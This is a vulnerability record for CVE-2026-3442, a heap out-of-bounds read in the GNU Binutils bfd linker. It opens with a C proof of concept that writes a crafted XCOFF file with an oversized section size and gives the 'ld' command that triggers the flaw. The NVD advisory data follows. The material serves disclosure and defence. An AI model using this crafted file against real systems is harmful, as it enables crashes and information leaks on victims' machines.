CVE-2026-3442

#include <stdio.h> #include <stdlib.h> #include <string.h> #pragma pack(1) typedef struct { unsigned short magic; // 0x01DF for XCOFF unsigned short nsections; // Number of sections unsigned int timestamp; // Timestamp unsigned int symptr; // Symbol table pointer unsigned int nsyms; // Number of symbols unsigned int opthdr; // Optional header size unsigned short flags; // Flags } XCOFF_HEADER; typedef struct { char name[8]; // Section name unsigned int paddr; // Physical address unsigned int vaddr; // Virtual address unsigned int size; // Section size unsigned int scnptr; // Section data pointer unsigned int relptr; // Relocation pointer unsigned int lnnoptr; // Line number pointer unsigned short nreloc; // Number of relocations unsigned short nlnno; // Number of line numbers unsigned int flags; // Flags } XCOFF_SECTION; int main() { FILE *fp = fopen("malicious.xcoff", "wb"); if (!fp) { perror("Failed to create file"); return 1; } // Craft malicious XCOFF header XCOFF_HEADER header = { .magic = 0x01DF, .nsections = 1, .timestamp = 0, .symptr = 0x1000, .nsyms = 0, .opthdr = 0, .flags = 0x0002 }; fwrite(&header, sizeof(XCOFF_HEADER), 1, fp); // Craft malicious section header with invalid size XCOFF_SECTION section = { .name = ".text", .paddr = 0, .vaddr = 0, .size = 0xFFFFFFFF, // Malicious oversized value .scnptr = 0x200, .relptr = 0, .lnnoptr = 0, .nreloc = 0, .nlnno = 0, .flags = 0x0040 }; fwrite(&section, sizeof(XCOFF_SECTION), 1, fp); // Add minimal padding data unsigned char padding[256] = {0}; fwrite(padding, 256, 1, fp); fclose(fp); printf("Malicious XCOFF file created: malicious.xcoff\n"); printf("Trigger with: ld -o output malicious.xcoff\n"); return 0; }

{"cve": {"id": "CVE-2026-3442", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:47.720", "lastModified": "2026-03-20T18:23:46.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in GNU Binutils. This vulnerability, a heap-based buffer overflow, specifically an out-of-bounds read, exists in the bfd linker component. An attacker could exploit this by convincing a user to process a specially crafted malicious XCOFF object file. Successful exploitation may lead to the disclosure of sensitive information or cause the application to crash, resulting in an application level denial of service."}, {"lang": "es", "value": "Se encontró una falla en GNU Binutils. Esta vulnerabilidad, un desbordamiento de búfer basado en montículo, específicamente una lectura fuera de límites, existe en el componente enlazador bfd. Un atacante podría explotar esto al convencer a un usuario de procesar un archivo objeto XCOFF malicioso especialmente diseñado. La explotación exitosa podría llevar a la divulgación de información sensible o causar que la aplicación falle, lo que resultaría en una denegación de servicio a nivel de aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:-:*:*:*:*:*:*:*", "matchCriteriaId": "70CA109B-85B9-4EF2-9A5F-A7D12F6EA878"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-3442", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443828", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}